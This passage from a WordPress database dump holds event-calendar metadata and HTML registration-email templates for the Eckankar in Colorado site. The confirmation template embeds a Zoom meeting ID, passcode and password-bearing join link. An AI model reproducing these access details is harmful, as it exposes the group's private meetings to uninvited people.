9959,268246,'_edit_lock','1679632017:15'),(179960,268246,'_edit_last','15'),(179961,268247,'_wp_attached_file','2023/03/TravelTips.webp'),(179962,268247,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:600;s:6:\"height\";i:337;s:4:\"file\";s:23:\"2023/03/TravelTips.webp\";s:8:\"filesize\";i:19748;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"TravelTips-300x169.webp\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:9030;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"TravelTips-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:4634;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:23:\"TravelTips-300x300.webp\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:10266;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:23:\"TravelTips-474x324.webp\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:16754;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:23:\"TravelTips-391x260.webp\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:13000;}s:8:\"tileview\";a:5:{s:4:\"file\";s:23:\"TravelTips-300x337.webp\";s:5:\"width\";i:300;s:6:\"height\";i:337;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:11642;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(179963,268248,'mec_color',''),(179964,268248,'mec_location_id','118'),(179965,268248,'mec_dont_show_map','0'),(179966,268248,'mec_organizer_id','1'),(179967,268248,'mec_read_more',''),(179968,268248,'mec_more_info',''),(179969,268248,'mec_more_info_title',''),(179970,268248,'mec_more_info_target','_self'),(179971,268248,'mec_cost',''),(179972,268248,'mec_currency','a:0:{}'),(179973,268248,'mec_additional_organizer_ids','a:0:{}'),(179974,268248,'mec_additional_location_ids','a:0:{}'),(179975,268248,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-04-15\";s:4:\"hour\";s:1:\"1\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-04-15\";s:4:\"hour\";s:1:\"2\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(179976,268248,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(179977,268248,'mec_certain_weekdays','a:0:{}'),(179978,268248,'mec_allday','0'),(179979,268248,'one_occurrence','0'),(179980,268248,'mec_hide_time','0'),(179981,268248,'mec_hide_end_time','0'),(179982,268248,'mec_comment',''),(179983,268248,'mec_timezone','global'),(179984,268248,'mec_countdown_method','global'),(179985,268248,'mec_public','1'),(179986,268248,'mec_start_date','2023-04-15'),(179987,268248,'mec_start_time_hour','1'),(179988,268248,'mec_start_time_minutes','0'),(179989,268248,'mec_start_time_ampm','PM'),(179990,268248,'mec_start_day_seconds','46800'),(179991,268248,'mec_end_date','2023-04-15'),(179992,268248,'mec_end_time_hour','2'),(179993,268248,'mec_end_time_minutes','0'),(179994,268248,'mec_end_time_ampm','PM'),(179995,268248,'mec_end_day_seconds','50400'),(179996,268248,'mec_repeat_status','0'),(179997,268248,'mec_repeat_type',''),(179998,268248,'mec_repeat_interval','1'),(179999,268248,'mec_repeat_end',''),(180000,268248,'mec_repeat_end_at_occurrences',''),(180001,268248,'mec_repeat_end_at_date',''),(180002,268248,'mec_advanced_days','a:0:{}'),(180003,268248,'mec_in_days',''),(180004,268248,'mec_not_in_days',''),(180005,268248,'mec_hourly_schedules','a:0:{}'),(180006,268248,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:1:\"1\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(180007,268248,'mec_tickets','a:0:{}'),(180008,268248,'mec_fees_global_inheritance','1'),(180009,268248,'mec_fees','a:0:{}'),(180010,268248,'mec_ticket_variations_global_inheritance','1'),(180011,268248,'mec_ticket_variations','a:0:{}'),(180012,268248,'mec_reg_fields_global_inheritance','1'),(180013,268248,'mec_reg_fields','a:0:{}'),(180014,268248,'mec_bfixed_fields','a:0:{}'),(180015,268248,'mec_op','a:0:{}'),(180016,268248,'mec_fields','a:0:{}'),(180017,268248,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:27:\"Eckankar Event Registration\";s:7:\"content\";s:6143:\"<div>\r\n<style>\r\n    table, td, div, h1, p \r\n      font-family: Arial, sans-serif;\r\n    }\r\n    @media screen and (max-width: 530px) {<br />\r\n      .unsub {<br />\r\n        display: block;<br />\r\n        padding: 8px;<br />\r\n        margin-top: 14px;<br />\r\n        border-radius: 6px;<br />\r\n        background-color: #555555;<br />\r\n        text-decoration: none !important;<br />\r\n        font-weight: bold;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 100% !important;<br />\r\n      }<br />\r\n    }<br />\r\n    @media screen and (min-width: 531px) {<br />\r\n      .col-sml {<br />\r\n        max-width: 27% !important;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 73% !important;<br />\r\n      }<br />\r\n    }<br />\r\n  </style>\r\n</div>\r\n<div role=\"article\" aria-roledescription=\"email\" style=\"text-size-adjust: 100%; -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; background-color: #ffffff;\" lang=\"en\">\r\n<table style=\"width: 100%; border: none; border-spacing: 0;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0;\" align=\"center\"><!-- [if mso]></p>\r\n<table role=\"presentation\" align=\"center\" style=\"width:600px;\">\r\n<tr>\r\n<td>\r\n<p>          <![endif]-->\r\n<table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 0px 10px 0px; background-color: #ffffff; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\"><img class=\"alignnone size-full wp-image-266555\" src=\"https://eckankar-colorado.org/wp-content/uploads/2022/04/email-img-registration-600-5.jpg\" alt=\"\" width=\"602\" height=\"302\" /></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px 20px 10px 20px; background-color: #f5f5f5; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\">\r\n<p style=\"margin: 0;\"><span style=\"color: #f28a27; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>Event Registration Confirmation</strong></span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px 10px 10px 10px; font-size: 0; background-color: #ffffff; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35);\"><!-- [if mso]></p>\r\n<table role=\"presentation\" width=\"100%\">\r\n<tr>\r\n<td style=\"width:145px; padding: 15px 10px 11px 10px;\" align=\"left\" valign=\"top\">\r\n<p>                <![endif]-->\r\n<div class=\"col-lge\" style=\"display: inline-block; width: 100%; max-width: 500px; vertical-align: top; padding-bottom: 20px; font-family: Arial,sans-serif; font-size: 18px; line-height: 22px; color: #363636;\">\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px;\"><b>Hello %%first_name%% and thank you for registering!</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 20px;\">You are signed up for the following online event:</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b><span style=\"color: #f28a27;\">Title: </span>%%event_title%%</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b style=\"color: #f28a27;\">Date: </b>%%event_start_date%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b style=\"color: #f28a27;\">Time: </b>%%event_start_time%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 15px;\"> </p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px; color: #f28a27;\"><b>Zoom Login Information:</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\"><b>Meeting ID: </b>891 2510 3432<br />\r\n<b>Passcode:</b> 162109</p>\r\n<p style=\"margin-top: 0; margin-bottom: 20px;\"><a href=\"https://us02web.zoom.us/j/89125103432?pwd=QVRETUo3bENGM0lKZzhDN2pjVGZnQT09\">https://us02web.zoom.us/j/89125103432?pwd=QVRETUo3bENGM0lKZzhDN2pjVGZnQT09</a></p>\r\n<p style=\"margin-top: 0; margin-bottom: 20px;\"><b>Dial-in number: </b>720-707-2699 (for those who need to join by phone)</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">After you click the link, you will be prompted to either download the app to enter the meeting or enter through your browser. Please note that Zoom works best if you download the app. It is more stable and has more functions. Select use computer audio for sound.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">Please join the meeting 5 - 10 minutes ahead of time to help us start on time. We look forward to seeing you at this online event.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">See you there!</p>\r\n</div>\r\n<p><!-- [if mso]>\r\n                </td>\r\n</tr>\r\n</table>\r\n<p>                <![endif]--></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px; font-size: 16px; line-height: 28px; background-color: #efefef; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35); text-align: center;\">You are receiving this email because you have submitted a request through the <a href=\"https://eckankar-colorado.org/\">Eckankar in Colorado</a> website. If you have any questions regarding the origin of this email, please feel free to get in touch, we\'re always happy to help out.</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px; background-color: #6e6e6e;\">\r\n<figure style=\"text-align: center;\"><span style=\"font-family: arial, helvetica, sans-serif;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </span></figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px; font-family: arial, helvetica, sans-serif;\">© Eckankar In Colorado -2022</span><br />\r\n<span style=\"font-family: arial, helvetica, sans-serif;\"><a title=\"Contact Us\" href=\"mailto:webmaster@eckankar-colorado.org\"><span style=\"font-size: 14px; line-height: 20px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto; color: #cccccc; margin: 0px;\">Contact Us</span></a></span></figure>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p><!-- [if mso]>\r\n          </td>\r\n</tr>\r\n</table>\r\n<p>          <![endif]--></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:22:\"New Event Registration\";s:7:\"content\";s:9944:\"<!-- [if !mso]><!--><!--<![endif]--><!-- [if (gte mso 9)|(IE)]>\r\n\r\n      <xml>\r\n        <o:OfficeDocumentSettings>\r\n          <o:AllowPNG/>\r\n          <o:PixelsPerInch>96</o:PixelsPerInch>\r\n        </o:OfficeDocumentSettings>\r\n      </xml>\r\n      <![endif]--><!-- [if (gte mso 9)|(IE)]>\r\n  \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n<style type=\"text/css\">\r\n    body {width: 600px;margin: 0 auto;}\r\n    table {border-collapse: collapse;}\r\n    table, td {mso-table-lspace: 0pt;mso-table-rspace: 0pt;}\r\n    img {-ms-interpolation-mode: bicubic;}\r\n  </style>\r\n<![endif]-->\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<p>\r\n<style type=\"text/css\">\r\n    body, p, div {\r\n      font-family: inherit;\r\n      font-size: 14px;\r\n    }\r\n    body {\r\n      color: #000000;\r\n    }\r\n    body a {\r\n      color: #1188E6;\r\n      text-decoration: none;\r\n    }\r\n    p { margin: 0; padding: 0; }\r\n    table.wrapper {\r\n      width:100% !important;\r\n      table-layout: fixed;\r\n      -webkit-font-smoothing: antialiased;\r\n      -webkit-text-size-adjust: 100%;\r\n      -moz-text-size-adjust: 100%;\r\n      -ms-text-size-adjust: 100%;\r\n    }\r\n    img.max-width {\r\n      max-width: 100% !important;\r\n    }\r\n    .column.of-2 {\r\n      width: 50%;\r\n    }\r\n    .column.of-3 {\r\n      width: 33.333%;\r\n    }\r\n    .column.of-4 {\r\n      width: 25%;\r\n    }\r\n    ul ul ul ul  {\r\n      list-style-type: disc !important;\r\n    }\r\n    ol ol {\r\n      list-style-type: lower-roman !important;\r\n    }\r\n    ol ol ol {\r\n      list-style-type: lower-latin !important;\r\n    }\r\n    ol ol ol ol {\r\n      list-style-type: decimal !important;\r\n    }\r\n    @media screen and (max-width:480px) {\r\n      .preheader .rightColumnContent,\r\n      .footer .rightColumnContent {\r\n        text-align: left !important;\r\n      }\r\n      .preheader .rightColumnContent div,\r\n      .preheader .rightColumnContent span,\r\n      .footer .rightColumnContent div,\r\n      .footer .rightColumnContent span {\r\n        text-align: left !important;\r\n      }\r\n      .preheader .rightColumnContent,\r\n      .preheader .leftColumnContent {\r\n        font-size: 80% !important;\r\n        padding: 5px 0;\r\n      }\r\n      table.wrapper-mobile {\r\n        width: 100% !important;\r\n        table-layout: fixed;\r\n      }\r\n      img.max-width {\r\n        height: auto !important;\r\n        max-width: 100% !important;\r\n      }\r\n      a.bulletproof-button {\r\n        display: block !important;\r\n        width: auto !important;\r\n        font-size: 80%;\r\n        padding-left: 0 !important;\r\n        padding-right: 0 !important;\r\n      }\r\n      .columns {\r\n        width: 100% !important;\r\n      }\r\n      .column {\r\n        display: block !important;\r\n        width: 100% !important;\r\n        padding-left: 0 !important;\r\n        padding-right: 0 !important;\r\n        margin-left: 0 !important;\r\n        margin-right: 0 !important;\r\n      }\r\n      .social-icon-column {\r\n        display: inline-block !important;\r\n      }\r\n    }\r\n  </style>\r\n</p>\r\n<p>\r\n<style>\r\nbody {font-family: \'Muli\', sans-serif;}\r\n</style>\r\n</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<!--user entered Head Start--><!--End Head user entered--><center class=\"wrapper\" data-link-color=\"#1188E6\" data-body-style=\"font-size:14px; font-family:inherit; color:#000000; background-color:#FFFFFF;\">\r\n<div class=\"webkit\">\r\n<table class=\"wrapper\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" bgcolor=\"#FFFFFF\">\r\n<tbody>\r\n<tr>\r\n<td valign=\"top\" bgcolor=\"#FFFFFF\" width=\"100%\">\r\n<table class=\"outer\" role=\"content-container\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td width=\"100%\">\r\n<table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td><!-- [if mso]>\r\n    <center>\r\n    \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n<table>\r\n<tr>\r\n<td width=\"600\">\r\n  <![endif]-->\r\n<table style=\"width: 100%; max-width: 600px;\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0px 0px 0px 0px; color: #000000; text-align: left;\" role=\"modules-container\" align=\"left\" bgcolor=\"#FFFFFF\" width=\"100%\">\r\n<table class=\"module preheader preheader-hide\" style=\"display: none !important; mso-hide: all; visibility: hidden; opacity: 0; color: transparent; height: 0; width: 0;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"preheader\">\r\n<tbody>\r\n<tr>\r\n<td role=\"module-content\">\r\n<p>&nbsp;</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table style=\"padding: 30px 20px 30px 20px;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" bgcolor=\"#f6f6f6\" data-type=\"columns\" data-distribution=\"1\">\r\n<tbody>\r\n<tr role=\"module-content\">\r\n<td valign=\"top\" height=\"100%\">\r\n<table class=\"column column-0\" style=\"width: 540px; border-spacing: 0; border-collapse: collapse; margin: 0px 10px 0px 10px;\" border=\"0\" width=\"540\" cellspacing=\"0\" cellpadding=\"0\" align=\"left\" bgcolor=\"\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0px; margin: 0px; border-spacing: 0;\">\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"6c9e9414-eb30-47e2-97d8-7bd6a4df5990\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 18px 0px 10px 0px; line-height: 24px; text-align: inherit;\" role=\"module-content\" valign=\"top\" bgcolor=\"\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"><span style=\"color: #1d5791; font-family: arial, helvetica, sans-serif; font-size: 36px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto;\">Admin Notification</span></div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"948e3f3f-5214-4721-a90e-625a47b1c957\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 30px 18px 30px; line-height: 26px; text-align: inherit; background-color: #efefef;\" role=\"module-content\" valign=\"top\" bgcolor=\"#efefef\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"><span style=\"color: #707172; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>New Event Registration</strong></span></div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"a10dcb57-ad22-4f4d-b765-1d427dfddb4e\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 18px 30px 18px 30px; line-height: 22px; text-align: inherit; background-color: #ffffff;\" role=\"module-content\" valign=\"top\" bgcolor=\"#ffffff\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 20px; color: #333333;\"><strong>A new registration has been submitted for the following event:</strong></span></div>\r\n<p>&nbsp;</p>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>%%event_title%%</strong></span></div>\r\n<div></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Date: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_date%%</strong></span></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Time: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_time%%</strong></span> </div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"a4e5faa9-7044-47fd-a4a1-b7a1746c258e\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 18px 0px 18px 5px; line-height: 22px; text-align: inherit; background-color: #efefef;\" role=\"module-content\" valign=\"top\" bgcolor=\"#efefef\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"><span style=\"font-size: 14pt;\">%%attendees_full_info%%</span> </div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"a265ebb9-ab9c-43e8-9009-54d6151b1600\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 8px 30px 40px 28px; line-height: 22px; text-align: inherit; background-color: #6e6e6e;\" role=\"module-content\" valign=\"top\" bgcolor=\"#6e6e6e\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"></div>\r\n<figure style=\"text-align: center;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px;\">© Eckankar In Colorado -2022</span></figure>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<!-- [if mso]>\r\n                                  </td>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n                                </tr>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n                              </table>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n                            </center>\r\n                            <![endif]--></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</center>\";}}'),(180018,268248,'mec_event_status','EventScheduled'),(180019,268248,'mec_moved_online_link',''),(180020,268248,'mec_cancelled_reason',''),(180021,268248,'mec_display_cancellation_reason_in_single_page',''),(180022,268248,'protect_children',''),(180023,268248,'passster_activate_global_protection',NULL),(180024,268248,'passster_activate_protection',NULL),(180025,268248,'passster_protection_type','password'),(180026,268248,'boldgrid_hide_page_title','0'),(180027,268248,'_thumbnail_id','268247'),(180028,268248,'_oembed_ace4d65561aa575fe8833c60d61f4161','{{unknown}}'),(180029,268248,'boldgrid_in_page_containers','1'),(180030,268248,'passster_area_shortcode',''),(180032,268248,'_dp_original','268246'),(180033,268248,'_edit_lock','1682292075:15'),(180034,268248,'_edit_last','15'),(181519,268411,'mec_op','a:0:{}'),(181520,268411,'mec_fields','a:0:{}'),(181521,268411,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Eckankar Event Registration\";s:7:\"content\";s:6143:\"<div>\r\n<style>\r\n    table, td, div, h1, p \r\n      font-family: Arial, sans-serif;\r\n    }\r\n    @media screen and (max-width: 530px) {<br />\r\n      .unsub {<br />\r\n        display: block;<br />\r\n        padding: 8px;<br />\r\n        margin-top: 14px;<br />\r\n        border-radius: 6px;<br />\r\n        background-color: #555555;<br />\r\n        text-decoration: none !important;<br />\r\n        font-weight: bold;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 100% !important;<br />\r\n      }<br />\r\n    }<br />\r\n    @media screen and (min-width: 531px) {<br />\r\n      .col-sml {<br />\r\n        max-width: 27% !important;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 73% !important;<br />\r\n      }<br />\r\n    }<br />\r\n  </style>\r\n</div>\r\n<div role=\"article\" aria-roledescription=\"email\" style=\"text-size-adjust: 100%; -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; background-color: #ffffff;\" lang=\"en\">\r\n<table style=\"width: 100%; border: none; border-spacing: 0;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0;\" align=\"center\"><!-- [if mso]></p>\r\n<table role=\"presentation\" align=\"center\" style=\"width:600px;\">\r\n<tr>\r\n<td>\r\n<p>          <![endif]-->\r\n<table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 0px 10px 0px; background-color: #ffffff; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\"><img class=\"alignnone size-full wp-image-266555\" src=\"https://eckankar-colorado.org/wp-content/uploads/2022/04/email-img-registration-600-5.jpg\" alt=\"\" width=\"602\" height=\"302\" /></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px 20px 10px 20px; background-color: #f5f5f5; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\">\r\n<p style=\"margin: 0;\"><span style=\"color: #f28a27; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>Event Registration Confirmation</strong></span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px 10px 10px 10px; font-size: 0; background-color: #ffffff; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35);\"><!-- [if mso]></p>\r\n<table role=\"presentation\" width=\"100%\">\r\n<tr>\r\n<td style=\"width:145px; padding: 15px 10px 11px 10px;\" align=\"left\" valign=\"top\">\r\n<p>                <![endif]-->\r\n<div class=\"col-lge\" style=\"display: inline-block; width: 100%; max-width: 500px; vertical-align: top; padding-bottom: 20px; font-family: Arial,sans-serif; font-size: 18px; line-height: 22px; color: #363636;\">\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px;\"><b>Hello %%first_name%% and thank you for registering!</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 20px;\">You are signed up for the following online event:</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 